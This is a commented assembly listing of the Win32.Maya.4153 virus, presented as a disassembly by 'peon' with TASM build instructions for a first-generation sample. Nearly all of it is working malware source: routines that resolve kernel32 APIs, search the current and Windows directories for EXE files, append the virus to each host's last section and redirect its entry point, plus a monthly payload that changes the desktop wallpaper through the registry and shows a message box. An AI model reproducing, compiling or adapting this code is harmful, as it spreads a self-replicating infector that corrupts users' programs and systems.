;
;		  Win32.Maya.4153 virus
;		disassembly done by peon
;
; Maya is a nonresident PE infector, which searches for victims in the current
; and the Windows directories. It may infect up to 10 files per round (or so).
; On the 1st of any month, infected files display a message box and
; set the wallpaper to 'SLAM'. Uses memory-mapped files.
; On start, Maya scans the host's imports for GetModuleHandleA for its purposes,
; then looks up APIs and searches for EXEs in the current and Windows
; dirs. Appends itself to the end of the EXEs by enlarging the last section
; of the file. Size growth is 4153 bytes (file size rounded up to file alignment).
; Infection mark is 'WM' in the checksum field of the DOS EXE header.
; (Files that can't be infected will carry this, however.)
; Has minor bugs (treats EXE header field 3Ch as a word (16-bit), etc.).
; Seems to contain code that is never executed (possibly incomplete).
;
;
; note: ignore the @xxxx stuff. They were important only while disassembling.
; note2: you will notice that the host's entry point is hardcoded to 3000h;
; if you compile with Borland tools, that doesn't make a difference, but
; otherwise you might face problems running the first generation.
;
;compilation:
;tasm32 /m /ml wm.asm
;tlink32 wm,,,import32.lib /Tpe
; ..and
;pewrsec wm.exe
; ...to avoid page faults of 1st generation
;

.386			;i do not comment these
.model flat		;because i guess these are well-known
			;and boring


extrn ExitProcess:proc			;1st generation needs this

extrn GetModuleHandleA:proc		;maya needs that the host imports
					;this function

;
;define two structures so need no includes
;
_find_data struc		;finddata structure for file searches
	_attr dd ?
	_creatlo dd ?
	_creathi dd ?
	_lastalo dd ?
	_lastahi dd ?
	_lastwlo dd ?
	_lastwhi dd ?
	_sizehi dd ?
	_sizelo dd ?
	_res0 dd ?
	_res1 dd ?
	_fname db 260 dup(?)		;the only important field for us
	_altname db 14 dup (?)		
_find_data ends

win32systime struc	;system time structure for payload checking
	wyear dw ?
	wmonth dw ?
	wdow dw ?
	wday dw ?	;we are interested in checking the day
	whour dw ?
	wmin dw ?
	wsec dw ?
	wmillisec dw ?
win32systime ends


.code
;------------------- viral code begins here -----------------------

maya_length equ maya_end-maya_start	;size of viral code
maya_start equ $

;
;calculate delta offset and get a handle to KERNEL32.dll
;
maya:
	push ebp		;store ebp on stack
	call maya_flexible_entry;flexible entry point
maya_flexible_entry:
	pop ebp			;will calculate delta offset
	mov ebx,ebp
	sub ebp,offset maya_flexible_entry
	mov eax,1000h		;RVA of viral section,hardcoded
maya_rva_of_viral_section equ $-4
	add eax,6		;
	sub ebx,eax		;got imagebase
	mov [ebp+offset maya_imagebase],ebx	;store imagebase
	mov edx,offset maya_getmodulehandlea
	add edx,ebp		;fetch ptr to 'GetModulaHandleA' string
	mov ecx,[ebp+offset maya_getmodulehandlea_len] ;fetch string length
	push ebp		;save delta
	call maya_lookup_getmodulehandle	;search for import in host
	pop ebp			;get delta bk
	cmp eax,-1		;failed?
	jz maya_restart_host	;yes,abort
	mov [ebp+offset maya_getmodulehandlea_add],eax	;store address
	push ebp		;push delta
	mov ebx,offset maya_k32	;fetch ptr to 'KERNEL32.dll' string
	add ebx,ebp		;add delta
	push ebx		;store parameter
	call eax		;call GetModuleHandleA('KERNEL32.dll')
	pop ebp			;get delta bk
	mov [ebp+offset maya_addof_k32],eax	;store add off K32
;
;look up api's
;
	mov edi,offset maya_getmodulehandlea_len ;add of length of 1st string
	add edi,ebp		;plus delta offset
maya_lookup_loop:
	mov ecx,[edi]		;get string length
	cmp ecx,'MAYA'		;end of api names?		
	jz maya_lookup_done	;yes
	add edi,4		;skip length of string
	mov edx,edi		;store ptr
	add edi,ecx		;edi points to where we want result
	push edi
	call maya_get_apis	;look up api
	pop edi
	mov [edi],eax		;store add
	add edi,4		;go to add of next
	jmp maya_lookup_loop	;and branch
maya_lookup_done:
	mov dword ptr [ebp+offset maya_infection_counter],0	;kill counter
;
;search for executables and infect them
;
	call maya_process_current_directory
	call maya_process_windows_directory
;
;lookup a few more apis--possibly incomplete
;
	call maya_lookup_more
;
;payload check
;
	call maya_payload
;
;jump to host
;
maya_restart_host:	
	mov eax,[ebp+offset maya_entry_of_host]	;get host entry rva
	add eax,[ebp+offset maya_imagebase]	;add imagebase
	pop ebp					;restore ebp
	push eax				;save return address
	ret					;and jump to host
;
;get api addresses needed for infection
;
maya_get_apis:
	mov esi,[ebp+offset maya_addof_k32] ;get add of K32
	cmp word ptr [esi],'ZM'		;is it an exe?
	jne maya_get_apis_return_failure;nope,abort
	xor eax,eax			;zero register
	mov ax,[esi+3ch]		;ptr to PE header
	add eax,[ebp+offset maya_addof_k32];plus K32 base
	xchg esi,eax			;into esi
	cmp word ptr [esi],'EP'		;is it a PE?
	jne maya_get_apis_return_failure;nope,abort
	mov esi,[esi+78h]		;get exports rva in K32
	add esi,[ebp+offset maya_addof_k32];plus K32 base
	mov eax,[esi+1ch]
	add eax,[ebp+offset maya_addof_k32]
	mov [ebp+offset maya_eat],eax	;store it
	mov eax,[esi+20h]		;ptrs to exported names
	add eax,[ebp+offset maya_addof_k32]
	mov [ebp+offset maya_expnames],eax	;store it
	mov eax,[esi+24h]		;ptrs to export ordinals
	add eax,[ebp+offset maya_addof_k32]
	mov [ebp+offset maya_eord],eax	;store it
	xor eax,eax			;zero register
maya_get_apis_loop:
	push ecx			;save string length
	mov esi,edx			;esi=ptr to name that is searched for
	mov edi,[ebp+offset maya_expnames];ptr to exported names
	add edi,eax	
	mov edi,[edi]			;fetch ptr to exported fuction name
	add edi,[ebp+offset maya_addof_k32]	;add K32 base
	repe				;compare names
	cmpsb
	cmp ecx,0			;perfect match?
	je maya_get_apis_found		;yes
	add eax,4			;nope,proceed with next
	pop ecx				;get string length back
	jmp maya_get_apis_loop		;and compare with next name in K32
maya_get_apis_found:	
	pop ecx				;remove ecx from stack
	shr eax,1			;halve eax
	add eax,[ebp+offset maya_eord]	;fix ptr to eord's
	xor ebx,ebx			;zero ebx
	mov bx,[eax]			;fetch eord
	shl ebx,2			;*4
	add ebx,[ebp+offset maya_eat]	;add exports add table offset
	mov eax,[ebx]			;get rva of function
	add eax,[ebp+offset maya_addof_k32];add base of K32
	ret				;and return to caller
maya_get_apis_return_failure:
	mov eax,-1			;return failure to caller
	ret
;
;searches the host's imports for GetModuleHandleA
;
maya_lookup_getmodulehandle:
	mov esi,[ebp+offset maya_imagebase]	;get imagebase
	cmp word ptr [esi],'ZM'			;host file must be exe	
	jne maya_lookup_getmodulehandle_return_failure ;but it isnt so abort
	xor eax,eax				;zero reg
	mov ax,[esi+3ch]			;ptr to PE head
	mov esi,eax				;into esi
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	cmp word ptr [esi],'EP'			;is it a PE?
	jne maya_lookup_getmodulehandle_return_failure ;nope,abort
	mov esi,[esi+80h]			;get imports rva
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	mov eax,esi
maya_lookup_getmodulehandle_dll_loop:
	mov esi,eax
	mov esi,[esi+0ch]			;name rva of dll module
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	cmp [esi],'NREK'			;is module name 'KERN...'?
	je maya_lookup_getmodulehandle_dll_ok	;yes
	add eax,14h				;next entry
	jmp maya_lookup_getmodulehandle_dll_loop;check next
maya_lookup_getmodulehandle_dll_ok:
	mov esi,eax
	mov eax,[esi+10h]			;import lookup table rva
	add eax,[ebp+offset maya_imagebase]	;add imagebase
	mov [ebp+offset maya_ilt],eax		;store ilt rva
	cmp dword ptr [esi],0			;
	je maya_lookup_getmodulehandle_return_failure
	mov esi,[esi]				;
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	mov ebx,esi				;store ptr
	xor eax,eax				;zero reg
maya_lookup_getmodulehandle_function_loop:
	cmp dword ptr [ebx],0
	je maya_lookup_getmodulehandle_return_failure
	cmp byte ptr [ebx+3],80h
	je maya_lookup_getmodulehandle_nextfunction
	mov esi,[ebx]
	add esi,[ebp+offset maya_imagebase]
	add esi,2
	mov edi,edx
	push ecx
	repe
	cmpsb				;compare function names
	cmp ecx,0			;match?
	pop ecx
	je maya_lookup_getmodulehandle_done ;yes
maya_lookup_getmodulehandle_nextfunction:
	inc eax
	add ebx,4
	jmp maya_lookup_getmodulehandle_function_loop	
maya_lookup_getmodulehandle_done:
	shl eax,2			;*4
	add eax,[ebp+offset maya_ilt]
	mov ebx,eax
	mov eax,[eax]			;got the add
	ret				;so return to the caller
maya_lookup_getmodulehandle_return_failure:
	mov eax,-1			;show that we failed
	ret				;and return to the caller
;
;file infection subroutine
;
maya_infect:			;@11F3
	mov dword ptr[ebp+offset maya_successfull_infection],0	;kill flag
	call maya_getfileattrs				;get file attr
	mov [ebp+offset maya_fileattrib],eax		;store it
	push edx					;ptr to filename
	mov eax,80h					;normal attr
	call maya_setfileattrs
	pop edx
	push edx
	call maya_openfile				;open file
	cmp eax,-1					;failed?
	je maya_infect_restore_attr			;yes,abort
	mov [ebp+offset maya_handle],eax		;store handle
	call maya_getfsize	
	cmp eax,-1					;failed?
	je maya_infect_closefile			;yes,abort
	cmp dword ptr [ebp+offset maya_filesize_high_dword],0 ;file smaller
							      ; than 4 GB?		
	jne maya_infect_closefile			;nope abort
	xchg ecx,eax
	mov [ebp+offset maya_filesize],ecx		;store filesize
	mov eax,[ebp+offset maya_handle]		;get handle
	mov ecx,[ebp+offset maya_filesize]		;get filesize
	add ecx,maya_length+1000h			;add virus size+1000h
	call maya_createfmap				;create file mapping
	cmp eax,0					;failed?
	je maya_infect_closemap				;yes,abort
	mov [ebp+offset maya_maphandle],eax		;store handle
	mov ecx,[ebp+offset maya_filesize]		;get size of victim
	add ecx,maya_length+1000h
	call maya_mapview				;MapViewOfFile()
	cmp eax,0					;failed?
	je maya_infect_closemap				;yes,abort
	mov [ebp+offset maya_mappedadd],eax		;store ptr
	mov esi,eax					;and load into esi
	cmp word ptr [esi],'ZM'				;EXE?
	jne maya_infect_unmap
	cmp word ptr [esi+12h],'MW'			;WM in the checksum
	je maya_infect_unmap				;field?(already inf'd)
	mov word ptr [esi+12h],'MW'			;mark infected
	xor eax,eax
	mov ax,[esi+3ch]				;ptr to PE header
	cmp ax,0					;no PE header?
	je maya_infect_unmap
	cmp eax,maya_filesize				;header located
;***							;beyond eof?
;bug:should be cmp eax,[ebp+maya_filesize] for proper operation
;***
	jnc maya_infect_unmap				;yes abort
	add eax,[ebp+offset maya_mappedadd]		;get add of mapped
	mov esi,eax					;PE header
	cmp word ptr [esi],'EP'				;PE?	
	jne maya_infect_unmap				;nope abort
	mov [ebp+offset maya_peptr],eax			;store ptr to PE head
	mov eax,[esi+3ch]				;get filealign
	mov [ebp+offset maya_filealign],eax		;store it
	mov eax,[ebp+offset maya_entry_of_host]		;get current host entry
	mov [ebp+offset maya_olderva],eax		;store it
	mov eax,[esi+28h]				;get victim entry rva
	mov [ebp+offset maya_entry_of_host],eax		;store it
	mov eax,[esi+74h]
	shl eax,3					;*8	
	add eax,[ebp+offset maya_peptr]
	add eax,78h
	xor ecx,ecx					;zero register
	mov cx,[esi+6]					;get object count
maya_infect_setwbit:	;@1318
	or dword ptr [eax+24h],80000000h		;set W bit of sections
	add eax,28h					;next section...
	loop maya_infect_setwbit
	sub eax,28h					;ptr to last entry	
	mov [ebp+offset maya_ptrtolastsection],eax	;store it	
	mov edi,eax					;ptr into edi
	mov eax,[edi+10h]				;get section PhysSize
	mov [ebp+offset maya_sectps],eax		;store it
	add eax,[edi+0ch]				;plus section rva
	mov [ebp+offset maya_rva_of_viral_section],eax	;patch code
	mov [ebp+offset maya_sectrva],eax		;store it
	push edi
	mov eax,[edi+14h]				;get section PhysOffs
	add eax,[ebp+offset maya_mappedadd]		;get ptr to raw
							;data of last section
	add eax,[edi+10h]				;add PhysSize
	mov edi,eax					;load ptr into edi
	mov esi,offset maya_start			;get virus start add
	add esi,ebp					;add delta offset
	mov ecx,maya_length				;length of code
	cld						;increase pointers
	rep						;move viral code..
	movsb						;..into the mapped..
	pop edi						;..executable
	add dword ptr [edi+10h],maya_length		;update..
							;..sectionPhysSize
	add dword ptr [ebp+offset maya_filesize],maya_length	;and filesize	
	xor edx,edx					;zero edx
	mov eax,[edi+10h]				;get section PhysSize
	mov ecx,[ebp+offset maya_filealign]
	push ecx					;calculates section..
	div ecx						;..PhysSize with respect
	pop ecx						;to file alignment unit
	sub ecx,edx					;calculate padding
	add [edi+10h],ecx				;and add to PhysSize
	add [ebp+offset maya_filesize],ecx
	mov eax,[edi+10h]				;get updated PhysSize
	mov [edi+8],eax					;set virtual size
	or dword ptr [edi+24h],20h			;set Code flag
	or dword ptr [edi+24h],20000000h		;set Executable flag
	mov esi,[ebp+offset maya_peptr]			;get ptr to PE head
	mov eax,[ebp+offset maya_sectrva]		;get rva of last section
	mov [esi+28h],eax				;set new entry point
	mov eax,[edi+0ch]				;get section rva
	add eax,[edi+10h]				;add section PhysSize
	mov [esi+50h],eax				;set imagesize
	mov eax,[ebp+offset maya_olderva]		;get current host entry
	mov [ebp+offset maya_entry_of_host],eax		;restore it
	mov dword ptr[ebp+offset maya_successfull_infection],1
							;set flag
maya_infect_unmap:	;@13D0
	mov eax,[ebp+offset maya_mappedadd]
	call maya_unmapview			;call UnmapViewOfFile
maya_infect_closemap:	;@13DB
	mov eax,[ebp+offset maya_maphandle]	;call CloseHandle
	call maya_closefile	
	mov eax,[ebp+offset maya_handle]	
	mov ecx,[ebp+offset maya_filesize]	
	call maya_setfilepo			;set file pointer to end
	cmp eax,-1
	je maya_infect_closefile
	mov eax,[ebp+offset maya_handle]
	call maya_seteof			;and set end of file
maya_infect_closefile:
	mov eax,[ebp+offset maya_handle]
	call maya_closefile			;finally close file
maya_infect_restore_attr:
	pop edx					;ptr to filename
	mov eax,[ebp+offset maya_fileattrib]
	call maya_setfileattrs			;restore attributes
	ret					;and return to caller
;
;subroutines used during infection
;
maya_openfile:		;@141F
	push ebp
	push 0
	push 80h
	push 3
	push 0
	push 1
	push 0C0000000h
	push edx
	mov eax,[ebp+offset maya_createfilea_add]
	call eax
	pop ebp
	ret
maya_closefile:		;@143D
	push ebp
	push eax
	mov eax,[ebp+offset maya_closehandle_add]
	call eax
	pop ebp
	ret
maya_createfmap:	;@1449
	push ebp
	push 0
	push ecx
	push 0
	push 4
	push 0
	push eax
	mov eax,[ebp+offset maya_createfilemappinga_add]
	call eax
	pop ebp
	ret
maya_mapview:		;@145E
	push ebp
	push ecx
	push 0
	push 0
	push 2
	push eax
	mov eax,[ebp+offset maya_mapviewoffile_add]
	call eax
	pop ebp
	ret
maya_unmapview:		;@1471
	push ebp
	push eax
	mov eax,[ebp+offset maya_unmapviewoffile_add]
	call eax
	pop ebp
	ret
maya_setfilepo:		;@147D
	push ebp
	push 0
	push 0
	push ecx
	push eax
	mov eax,[ebp+offset maya_setfilepointer_add]
	call eax
	pop ebp
	ret
maya_seteof:		;@148E
	push ebp
	push eax
	mov eax,[ebp+offset maya_setendoffile_add]
	call eax
	pop ebp
	ret
maya_getfsize:		;@149A
	push ebp
	mov ebx,offset maya_filesize_high_dword ;get add of room for
	add ebx,ebp				;hi dword of filesize
	push ebx				;store ptr
	push eax				;store handle
	mov eax,[ebp+offset maya_getfilesize_add];get fn add
	call eax		;call fn
	pop ebp
	ret
maya_getfileattrs:		;@14AE
	push ebp
	push edx
	push edx		;store filename as param
	mov eax,[ebp+offset maya_getfileattributesa_add]
	call eax		;call function
	pop edx
	pop ebp
	ret
maya_setfileattrs:		;@14BC
	push ebp
	push eax		;store params
	push edx
	mov eax,[ebp+offset maya_setfileattributesa_add]
	call eax		;call fn
	pop ebp
	ret
maya_getcurrdir:		;@14C9
	push ebp
	push eax		;ptr to buffer
	push 80h		;buffer size
	mov eax,[ebp+offset maya_getcurrentdirectorya_add]
	call eax
	pop ebp
	ret
maya_setcurrdir:		;@14DA
	push ebp
	push eax		;ptr to path
	mov eax,[ebp+offset maya_setcurrentdirectorya_add]
	call eax
	pop ebp
	ret
maya_getwindir:			;@14E6
	push ebp
	push 80h		;buffer size
	push eax		;ptr to buffer
	mov eax,[ebp+offset maya_getwindowsdirectorya_add]
	call eax
	pop ebp
	ret
maya_getsystime:		;@14F7
	push ebp
	mov eax,offset maya_systime
	add eax,ebp	
	push eax		;store ptr to structure to be filled
	mov eax,[ebp+offset maya_getsystemtime_add]
	call eax		;call fn
	pop ebp
	ret
maya_getmodhand:		;@150A
	push ebp
	push eax
	mov eax,[ebp+offset maya_getmodulehandlea_add]
	call eax
	pop ebp
	ret
maya_getprocadd:		;@1516
	push ebp
	push edx		;ptr to fn name
	push eax		;hModule
	mov eax,[ebp+offset maya_getprocaddress_add]
	call eax
	pop ebp
	ret
;
;
;
maya_lookup_more:	;@1523
	mov edi,offset maya_movefilea_len	;ptr to more api names
	add edi,ebp				;plus delta offset
maya_lookup_more_loop:		;loop begins here
	mov ecx,[edi]		;get length of name string
	cmp ecx,'SHAI'		;end of api names?	
	je maya_lookup_more_return	;yes
	add edi,4		;skip length of string
	mov edx,edi		;edx points to api name
	push edi		;save regs
	push ecx
	push ebp
	call maya_lookup_getmodulehandle	;get fn add
;this call will fail or virus causes a fault at line 579
	pop ebp			;get regs back
	pop ecx
	pop edi
	add edi,ecx		;get ptr to room for address,after api name
	cmp eax,-1
	je maya_lookup_more_nextfn
	mov [edi],eax		;store fn add
	mov eax,[edi+4]
	add eax,ebp
	mov [ebx],eax
maya_lookup_more_nextfn:
	add edi,8		;next
	jmp maya_lookup_more_loop
maya_lookup_more_return:	;@1559
	ret
;
;the following code is probably dead
;
maya_deadcode:
	pushad
	call maya_deadcode_calculate_deltaoffset
	add ecx,28h
	mov edx,[esp+ecx]
	call maya_deadcode_extension_check
	cmp eax,1
	jne maya_deadcode_skip
	call maya_infect
maya_deadcode_skip:
	popad
	ret		

maya_deadcode_extension_check:
	mov esi,edx		;get filename ptr into esi
	cld			;increase ptrs
maya_deadcode_extension_check_loop:
	lodsb			;fetch character of filename
	cmp al,0		;null?
	je maya_deadcode_extension_check_ret0	;yes abort
	cmp al,'.'		;dot?
	jne maya_deadcode_extension_check_loop	;nope branch to find dot
	cmp dword ptr [esi-1],'EXE.';extension check
	je maya_deadcode_extension_check_ret1
	cmp dword ptr [esi-1],'exe.';extension check
	je maya_deadcode_extension_check_ret1
maya_deadcode_extension_check_ret0:
	xor eax,eax		;return failure
	ret
maya_deadcode_extension_check_ret1:
	mov eax,1		;return success
	ret
;@159x
;
;these calls don't seem to be executed
;
maya_deadcode_call1 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_movefilea_add]
maya_deadcode_call2 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_copyfilea_add]
maya_deadcode_call3 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_createfilea2_add]
maya_deadcode_call4 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_deletefilea_add]
maya_deadcode_call5 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_setfileattributesa2_add]
maya_deadcode_call6 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_getfileattributesa2_add]
maya_deadcode_call7 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_getfullpathnamea_add]
maya_deadcode_call8 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_createprocessa_add]

maya_deadcode_hook:
	mov ecx,4
	call maya_deadcode
	push ebp
	call maya_deadcode_calculate_deltaoffset
	mov ecx,ebp
	pop ebp
	ret

maya_deadcode_calculate_deltaoffset:
	call $+5
maya_deadcode_calculate_deltaoffset_plus5:
	pop ebp
	sub ebp,offset maya_deadcode_calculate_deltaoffset_plus5
	ret	
;
;file searching routines
;
maya_process_windows_directory:
	mov dword ptr[ebp+offset maya_infection_counter],0	;kill counter
	call maya_process_current_directory	;attack current dir again		
	cmp dword ptr[ebp+offset maya_infection_counter],5 ;inf'd 5 files again?
	je maya_process_windows_directory_return	;if so return
	mov eax,offset maya_currdir
	add eax,ebp
	call maya_getcurrdir
	cmp eax,0
	je maya_process_windows_directory_return
	mov eax,offset maya_windir
	add eax,ebp
	call maya_getwindir
	cmp eax,0
	je maya_process_windows_directory_return
	mov eax,offset maya_windir
	add eax,ebp
	call maya_setcurrdir
	cmp eax,0
	je maya_process_windows_directory_return
	call maya_process_current_directory
	mov eax,offset maya_currdir
	add eax,ebp
	call maya_setcurrdir
maya_process_windows_directory_return:
	ret				;return to caller
;
;routine to scan for and infect files in the current directory
;
maya_process_current_directory:		;@1674
	push ebp
	mov eax,offset maya_finddata	;get add of structure
	add eax,ebp			;add delta offset
	push eax			;store parameter
	mov eax,offset maya_filemask	;get add of filemask
	add eax,ebp			;add delta offset
	push eax			;store parameter
	mov eax,[ebp+offset maya_findfirstfilea_add];get add of FindFirstFileA
	call eax			;call function
	pop ebp
	cmp eax,-1			;failed?
	je maya_process_current_directory_return;yes
	mov [ebp+offset maya_findhandle],eax	;store handle
	mov edx,offset maya_finddata._fname	;get ptr to filename
	add edx,ebp				;add delta offset
	call maya_infect			;try to infect file	
	cmp dword ptr[ebp+offset maya_successfull_infection],1	;check flag
	jne maya_process_current_directory_findnext
	inc dword ptr[ebp+offset maya_infection_counter]	;increment counter
	cmp dword ptr[ebp+offset maya_infection_counter],5;already infected 5 files?
	je maya_process_current_directory_return ;yes so return to caller
maya_process_current_directory_findnext:
	push ebp
	mov eax,offset maya_finddata	;get add of structure
	add eax,ebp			;add delta offset
	push eax			;store parameter				
	push dword ptr[ebp+offset maya_findhandle]	;store parameter
	mov eax,[ebp+offset maya_findnextfilea_add]	;get add of FindNextFileA
	call eax				;call function
	pop ebp	
	cmp eax,0				;found more?
	je maya_process_current_directory_return;nope
	mov edx,offset maya_finddata._fname	;get filename
	add edx,ebp				;add delta offset
	call maya_infect			;try to infect file
	cmp dword ptr[ebp+offset maya_successfull_infection],1 ;inf ok?
	jne maya_process_current_directory_findnext   ;nope proceed
	inc dword ptr[ebp+offset maya_infection_counter]	      ;inc counter
	cmp dword ptr[ebp+offset maya_infection_counter],5     ;already 5?
	je maya_process_current_directory_return      ;yes return to caller
	jmp maya_process_current_directory_findnext   ;nope find more files
maya_process_current_directory_return:
	ret						;return to caller

maya_payload:		;@1701
;
;on the 1st of any month,creates a slam.bmp file containing a SLAM logo
;and sets the wallpaper to it.Then displays a messagebox.
;
	call maya_getsystime		;fill system time structure
	cmp word ptr[ebp+offset maya_systime.wday],1 ;1st of any month?
	jne maya_payload_return			;nope abort
	mov eax,offset maya_user32		;ptr to 'USER32.dll' string
	add eax,ebp				;add delta offset
	call maya_getmodhand			;get hModule to user32
	cmp eax,0				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_u32hand],eax	;store hModule to user32
	mov eax,offset maya_advapi32		;ptr to 'ADVAPI32.dll' string
	add eax,ebp				;add delta offset
	call maya_getmodhand			;get hModule
	cmp eax,0				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_a32hand],eax	;store hModule	
	mov edx,offset maya_regopenkeyexa	;get ptr
	add edx,ebp				;add delta offset
	mov eax,[ebp+offset maya_a32hand]	;get handle to advapi32
	call maya_getprocadd			;get add of RegOpenKeyExA fn
	cmp eax,0				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_regopenkeyexa_add],eax ;store add
;
;now gets the address of 3 more fn's:RegSetVauleExA,MessageBoxA,
;and SystemParametersInfo.It is identical to the method above,
;so i dont waste time commenting it
;
	mov edx,offset maya_regsetvalueexa	;asciiz of fn
	add edx,ebp
	mov eax,[ebp+offset maya_a32hand]
	call maya_getprocadd
	cmp eax,0
	je maya_payload_return
	mov [ebp+offset maya_regsetvalueexa_add],eax ;store add
	mov edx,offset maya_messageboxa		;asciiz of fn
	add edx,ebp
	mov eax,[ebp+offset maya_u32hand]
	call maya_getprocadd
	cmp eax,0
	je maya_payload_return
	mov [ebp+offset maya_messageboxa_add],eax	;store add
	mov edx,offset maya_sysparam
	add edx,ebp					;add delta offset
	mov eax,[ebp+offset maya_u32hand]	;get handle to user32.dll
	call maya_getprocadd		;call fn
	cmp eax,0			;failed?
	je maya_payload_return		;yes abort
;
;creates the .bmp file
;
	mov [ebp+offset maya_sysparam_add],eax
	push 0			;hTemplate is null
	push 80h		;attribute normal
	push 2			;create always,overwrite if exists
	push 0			;no security attrs struct,so we pass null
	push 1			;share_read
	push 40000000h		;generic write access
	mov eax,offset maya_slamfilename;ptr to filename
	add eax,ebp		;add delta offset
	push eax		;ptr to filename
	mov eax,[ebp+offset maya_createfilea_add];get fn add
	call eax				;call CreateFileA()
	cmp eax,-1				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_slamhandle],eax	;store handle	
	push 0				;null as overlapped ptr to WriteFile
	mov eax,offset maya_numberofwritten	;add of room
						;for # of written bytes
	add eax,ebp				;plus delta offset
	push eax				;store parameter
	push dword ptr slam_len			;length of .bmp
	mov eax,offset slam			;ptr to .bmp
	add eax,ebp				;plus delta offset
	push eax				;store parameter
	push dword ptr [ebp+offset maya_slamhandle] ;store handle for WriteFile
	mov eax,[ebp+offset maya_writefile_add]	;get add of fn
	call eax				;call fn
	push dword ptr[ebp+offset maya_slamhandle];push handle
	mov eax,[ebp+offset maya_closehandle_add];get fn add
	call eax				;call fn
;
;registry manipulations to modify wallpaper
;
	mov eax,offset maya_reg			;address of result
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 2					;desired access:KEY_SET_VALUE
	push 0					;reserved,must be null
	mov eax,offset maya_cpd			;ptr to 'Control Panel\Desktop'
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 80000001h				;HKEY_CURRENT_USER
	mov eax,[ebp+offset maya_regopenkeyexa_add];get fn address
	call eax				;call RegOpenKeyExA
	push 2					;size of value data
	mov eax,offset maya_one			;'1' character
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 1					;type of data:1=zero terminated
						;string
	push 0					;reserved,must be null
	mov eax,offset maya_tilewallpaper	;ptr to 'Tilewallpaper'
	add eax,ebp				;add delta offset
	push eax				;value name to set
	push dword ptr [ebp+offset maya_reg]	;hKey
	mov eax,[ebp+offset maya_regsetvalueexa_add]
	call eax				;call fn
	push 2					;size of value data
	mov eax,offset maya_zero		;'0' character
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 1					;data type
	push 0					;reserved
	mov eax,offset maya_wallpaperstyle	;ptr to value name
	add eax,ebp				;add delta offset
	push eax				;pass param
	push dword ptr[ebp+offset maya_reg]	;hKey
	mov eax,[ebp+offset maya_regsetvalueexa_add];get fn add
	call eax				;call fn
	push 0
	mov eax,offset maya_slamfilename	;file containing .bmp
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 0
	push 14h				;SPI_SETDESKWALLPAPER
	mov eax,[ebp+offset maya_sysparam_add]	;get fn add
	call eax				;call fn:update desktop
;
;messagebox
;
	push 30h				;MB_OK+MB_ICONEXCLAMATION style
	mov eax,offset maya_viralert		;title of msgbox
	add eax,ebp				;add delta offset
	push eax				;pass param
	mov eax,offset maya_mayamsg		;ptr to msg of msgbox
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 0					;hWnd of caller (virus)
	mov eax,[ebp+offset maya_messageboxa_add]	;get fn add
	call eax				;call MessageBox fn
maya_payload_return:
	ret					;return to caller
;
;data related to virus
;

maya_msg	db 'To Aparna S. : Forever in love with you...'
;
;fuck all the motherfucking bitches
;

maya_addof_k32	dd 0		;address of KERNEL32.dll module
maya_imagebase	dd 0		;imagebase of host @18FC
maya_windir	db 128 dup(0)	;room for Windows directory ASCIIZ string @1900
maya_currdir	db 128 dup (0)	;room for current directory ASCIIZ string @1980
maya_systime	win32systime ;win32 system time structure @1A00
maya_finddata _find_data 	;finddata structure for file searches @1A10


maya_fileattrib			dd 0	;attribute of victim @1B58
maya_successfull_infection	dd 0	;flag that indicates the infection
					;routines completed operation @1B5C
maya_infection_counter	dd 0	;counter of infections @1B60
maya_eat		dd 0	;export address table
maya_expnames		dd 0	;exported names
maya_eord		dd 0	;exports ordinals
maya_ilt		dd 0	;import lookup table rva


maya_findhandle		dd 0	;handle used in file searches
maya_filemask	db '*.EXE',0	;filemask used to find victims @1B51

maya_filesize_high_dword	dd 0	;hi dword of filesize @1B74
maya_filesize			dd 0	;lo dword of filesize @1B78
maya_handle		dd 0	;handle of file being infected	@1B7C
maya_maphandle		dd 0	;handle of filemapping object	@1B80
maya_mappedadd		dd 0	;address where file is mapped	@1B84
maya_peptr		dd 0	;PE head ptr			@1B88
maya_ptrtolastsection	dd 0	;ptr to last entry in section table @1B8C
maya_filealign		dd 0	;file alignment unit size	@1B90
maya_entry_of_host	dd 3000h	;host entry rva  @1B94
; yikes--hardcoded for 1st generation:)

maya_sectrva		dd 0	;rva of viral section	 @1B98
maya_olderva		dd 0	;temporary storage of host entry point @1B9C
maya_sectps		dd 0	;PhysSize of last section @1BA0
maya_k32	db 'KERNEL32.dll',0	;@1BA4
;
;api names
;
maya_getmodulehandlea_len	dd 17		;@1BB1
maya_getmodulehandlea		db 'GetModuleHandleA',0
maya_getmodulehandlea_add	dd 0

maya_getprocaddress_len		dd 15
maya_getprocaddress		db 'GetProcAddress',0
maya_getprocaddress_add		dd 0

maya_createfilea_len		dd 12
maya_createfilea		db 'CreateFileA',0
maya_createfilea_add		dd 0

maya_writefile_len		dd 10
maya_writefile			db 'WriteFile',0
maya_writefile_add		dd 0

maya_getfilesize_len		dd 12
maya_getfilesize		db 'GetFileSize',0
maya_getfilesize_add		dd 0

maya_createfilemappinga_len	dd 19
maya_createfilemappinga		db 'CreateFileMappingA',0
maya_createfilemappinga_add	dd 0

maya_mapviewoffile_len		dd 14
maya_mapviewoffile		db 'MapViewOfFile',0
maya_mapviewoffile_add		dd 0

maya_unmapviewoffile_len	dd 16
maya_unmapviewoffile		db 'UnmapViewOfFile',0
maya_unmapviewoffile_add	dd 0

maya_closehandle_len		dd 12
maya_closehandle		db 'CloseHandle',0
maya_closehandle_add		dd 0

maya_findfirstfilea_len		dd 15
